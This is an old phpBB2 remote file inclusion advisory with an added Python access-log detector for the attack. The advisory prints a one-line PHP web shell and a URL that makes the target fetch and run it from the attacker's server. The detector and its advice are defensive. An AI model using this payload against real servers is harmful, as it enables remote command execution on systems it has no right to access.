> PhpBB2 Remote Command Execution
>------------------------------------------------------------------------
>
>
>SUMMARY
>
>The phpbb_root_path variable accepts scripts from external servers, which
>makes phpBB2 vulnerable to remote command execution using a custom script
>written by the attacker.
>
>DETAILS
>
>Vulnerable systems:
>phpBB2 version 2.0.
>
>
>The "phpBB2 root path" variable accepts input from other web sites, and
>this enables remote attackers to execute arbitrary commands remotely.
>The vulnerability lies in the fact that db.php accepts the following
>input:
>'/phpBB2/includes/db.php?phpbb_root_path=full_path_to_script'
>Where the full_path_to_script can be a full URL from another web server.
>
>For example, create a directory called 'db' on your web server. Now at
>this db directory create a file called 'mysql.txt' or 'mysql4.txt' or
>'postgres.txt' (other file names don't seem to work).
>
>This mysql.txt should contain this line:
>
> <? echo "<pre>"; system($cmd); ?>
>
>The next step is to type in the following URL in your browser:
>
>http://example.com/phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a
>
>You should get the 'uname result' of example.com
>
>
>ADDITIONAL INFORMATION
>
>This vulnerability was found by pokley and nullbyte.
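
A log check for the request pattern the advisory above describes, as an added example that is not part of the original post: it flags access-log lines where `phpbb_root_path` carries a URL (including double-encoded ones) or `phpEx` is overridden by the client. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request part of a combined-format access log line (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A scheme such as http:// or ftp://, or a protocol-relative //host prefix.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp) a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return the reasons a log line matches the request described in the advisory."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    reasons = []
    # parse_qs has already decoded once; decode further to catch double encoding.
    if any(REMOTE_RE.match(fully_unquote(v)) for v in query.get("phpbb_root_path", [])):
        reasons.append("phpbb_root_path points at a remote host")
    if any(fully_unquote(v).lower() != "php" for v in query.get("phpEx", [])):
        reasons.append("phpEx overridden by client")
    return reasons

def scan(lines):
    """Map 1-based line numbers to reasons, for lines with at least one hit."""
    hits = {}
    for number, line in enumerate(lines, start=1):
        reasons = inspect_line(line)
        if reasons:
            hits[number] = reasons
    return hits

# Constructed sample log lines (documentation addresses, placeholder hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /phpBB2/viewtopic.php?t=12 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [01/Jan/2003:10:00:05 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=http://your_http_server/&dbms=mysql&phpEx=txt&cmd=uname%20-a HTTP/1.0" 200 310',
    '192.0.2.44 - - [01/Jan/2003:10:00:09 +0000] "GET /phpBB2/includes/db.php?phpbb_root_path=%2568ttp%253A%252F%252Fhost.invalid%252F&dbms=mysql HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG).items():
        print(number, "; ".join(reasons))
```

A hit on `includes/db.php` with a 200 response is worth correlating with outbound HTTP connections from the web server at the same time, since the include fetches the remote file.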
